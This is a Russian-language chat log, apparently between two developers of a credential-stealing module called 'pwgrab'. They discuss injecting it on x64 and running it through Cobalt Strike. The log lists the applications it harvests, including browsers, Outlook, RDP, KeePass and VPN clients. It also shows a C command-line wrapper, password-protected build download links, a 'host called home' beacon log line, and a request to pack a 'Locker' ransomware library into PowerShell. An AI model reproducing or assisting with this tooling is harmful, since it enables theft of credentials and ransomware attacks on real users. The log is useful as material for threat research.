Timestamp	From	To	Message
2021-03-19 07:04:15.724516	steller	reshaev	Привет. Отпиши как будешь.
2021-03-19 08:42:47.948006	steller	reshaev	Привет. Отпиши как будешь.
2021-03-19 08:45:28.993173	reshaev	steller	Тут
2021-03-19 08:45:30.787749	reshaev	steller	Привет
2021-03-19 08:45:46.414956	reshaev	steller	Мне отскочить надо на 30 мин
2021-03-19 08:47:09.745061	steller	reshaev	Тут
2021-03-19 08:47:09.746269	steller	reshaev	Привет
2021-03-19 08:47:09.748399	steller	reshaev	Мне отскочить надо на 30 мин
2021-03-24 10:24:39.684403	steller	reshaev	Привет. Получилось x64 заинжектить?
2021-03-24 10:25:16.061982	reshaev	steller	Привет
2021-03-24 10:25:20.335411	reshaev	steller	Я тут пока другим занят
2021-03-24 10:25:31.598996	reshaev	steller	Сегодня вечером наверно прочекаю
2021-03-29 10:06:49.600355	steller	reshaev	Привет. Как дела?
2021-03-29 10:18:19.891762	reshaev	steller	Привет, по pwgrab?
2021-03-29 10:21:53.016157	steller	reshaev	Да, ты хотел x64 потестить)
2021-03-29 10:22:04.266074	reshaev	steller	Щас проверять буду
2021-03-29 10:22:13.034549	reshaev	steller	Там сервак кобы накрылся новый жду
2021-03-29 10:23:17.333298	steller	reshaev	Сейчас среду пообещали скинуть тебе
2021-03-30 08:34:37.079488	steller	reshaev	Привет. Тут?
2021-03-30 11:03:34.856358	reshaev	steller	привет да
2021-03-30 11:12:07.419441	reshaev	steller	привет да
2021-03-30 11:25:01.200817	steller	reshaev	Проверил у себя 2 модуля. На инжекторе КС работают.
Можешь у себя запустить?
2021-03-30 11:41:52.872443	reshaev	steller	Проверил у себя 2 модуля. На инжекторе КС работают.
Можешь у себя запустить?
2021-03-30 13:33:07.087535	reshaev	steller	Тут?
2021-03-30 13:46:15.547851	steller	reshaev	Да. Получил сообщение?
2021-03-30 13:46:30.996288	reshaev	steller	[11:34:37] <steller> Привет. Тут?
2021-03-30 13:46:33.628325	reshaev	steller	только это
2021-03-30 13:46:48.962958	steller	reshaev	Проверил у себя 2 модуля. На инжекторе КС работают.
Можешь у себя запустить?
2021-03-30 13:47:11.921952	reshaev	steller	Правки какие-то делал?
2021-03-30 13:49:59.077256	steller	reshaev	Постоянно обновляю. Ещё параметры нужно будет добавить в модуль
2021-03-30 13:49:59.077944	steller	reshaev	A:\Project\pwgrab\build-pwgrab\release\Desktop_msvc_15_0_64bit
Dowload URL:
https://file.io/4Tox7KUZzbzW
Pass:
om&emwnA_$O%w5pitqE>
2021-03-30 13:51:25.337150	reshaev	steller	Ага ща проверю
2021-04-01 10:03:11.120373	steller	reshaev	Привет. Тут обновления по модулю есть.
2021-04-01 10:03:23.371487	steller	reshaev	Можешь кое-что добавить?
2021-04-01 10:53:57.780269	reshaev	steller	Привет
2021-04-01 10:54:00.433654	reshaev	steller	Да, что?
2021-04-01 10:55:48.674291	steller	reshaev	Вот добавил:
2021-04-01 10:55:53.604580	steller	reshaev	Собираемые приложения можно передавать модулю через командную строку:
-f <output file>
-a <grabbed app>[,<...>...]\r\n");
apps: Firefox, Chrome, IE, Edge, Outlook, Filezila, WinSCP, VNC, RDP, Putty,
      TeamViewer, Precious, Git, OpenVPN, OpenSSH, KeePass, AnyConnect, RDCMan
Пример: -f out.txt -a chrome,winscp
2021-04-01 10:57:24.985336	steller	reshaev	Вот обёртка:
  const int CmdLineSize = 200;
  char *CmdLine = (LPBYTE)HeapAlloc(GetProcessHeap(), 0, CmdLineSize);
  CmdLine[0] = 0;
  for(int i = 2; i < argc; i++)
  {
    strcat_s(CmdLine, CmdLineSize, argv[i]);
    if(i < argc - 1) strcat_s(CmdLine, CmdLineSize, " ");
  }
s((HWND)&OutputData, (HINSTANCE)&OutputSize, CmdLine, SW_MAX + 1);
2021-04-01 11:04:35.104861	reshaev	steller	Ок
2021-04-01 11:04:38.076426	reshaev	steller	Сделаю сейчас
2021-04-01 11:14:21.654597	reshaev	steller	Это готово уже у тебя?
2021-04-01 11:15:41.213865	reshaev	steller	Скинь мне тогда модуль если готово, у меня уже передача аргументов реализована просто передать надо в твою функцию
2021-04-01 11:36:20.959265	steller	reshaev	С обновлением:
A:\Project\pwgrab\Bin\publish\sg1.4.2021
Dowload URL:
https://file.io/0FRsvyxDS51A
Pass:
(YY%DIA1GsC^N_m&nE3)
2021-04-01 11:36:52.775492	reshaev	steller	А слушай
2021-04-01 11:37:28.635564	reshaev	steller	А хотя ни чего
2021-04-01 11:39:00.059526	steller	reshaev	Если что пиши. Там много модулей выбери нужные.
2021-04-01 11:39:52.844574	reshaev	steller	А тебя не затруднит в utf 16 cmdline сделать?
2021-04-01 11:42:20.288979	steller	reshaev	Можно, в принципе. А rundll32 тоже будет в u16 передавать? Скорее всего нужно сделать как там, т.к. модуль по-разному запускается.
2021-04-01 11:57:04.949589	steller	reshaev	Чёт не нашёл чтобы WCHAR* в rundll32 передавалось
2021-04-01 12:25:11.988016	reshaev	steller	Можно regsvr32 юзать там wchar
2021-04-01 12:27:19.337182	reshaev	steller	Хотя в принципе я могу конвертировать в инжекторе
2021-04-01 12:31:25.727582	steller	reshaev	Наверно проще MultiByteToWideChar сделать. Не видел, чтобы через regsvr32 запускалось. Она же на COM заточена.
2021-04-01 12:46:50.031900	reshaev	steller	Через нее так же можно любую dll запустить
2021-04-01 12:47:08.502686	reshaev	steller	Ну ладно в общем да не проблема MultiByteToWideChar сделать
2021-04-01 13:42:18.498242	reshaev	steller	Все работает
2021-04-01 13:42:22.549092	reshaev	steller	В файл выводит
2021-04-01 13:55:29.005089	steller	reshaev	Отлично 👍
2021-04-06 15:06:24.795363	steller	reshaev	Привет.
Тут в логе pwgrab
2021-04-06 15:06:28.521951	steller	reshaev	[+] host called home, sent: 796954 bytes
2021-04-06 15:06:49.348120	steller	reshaev	Что за байты?
2021-04-06 16:15:52.931908	reshaev	steller	Привет
2021-04-06 16:15:55.571414	reshaev	steller	Это размер dll
2021-04-28 10:47:32.998432	reshaev	steller	Привет
2021-04-28 10:47:33.002771	reshaev	steller	Это размер dll
2021-10-05 08:17:09.032115	steller	reshaev	Привет.
2021-10-05 08:17:39.097003	steller	reshaev	Тебе какую либу нужно запаковать в ps?
2021-10-05 10:05:47.385741	reshaev	steller	Privet
2021-10-05 10:05:56.033172	reshaev	steller	Locker
2021-10-05 10:09:22.625799	steller	reshaev	Тебе автоматический скрипт для запаковки сделать, или конкретную либу скинешь?
2021-10-06 11:26:25.114310	steller	reshaev	Привет.
2021-10-06 11:26:27.528443	steller	reshaev	Отпиши, скину скрипт
2021-11-16 17:21:13.542086	reshaev	steller	Какие модули
2021-11-17 07:11:51.808018	reshaev	steller	Какие модули
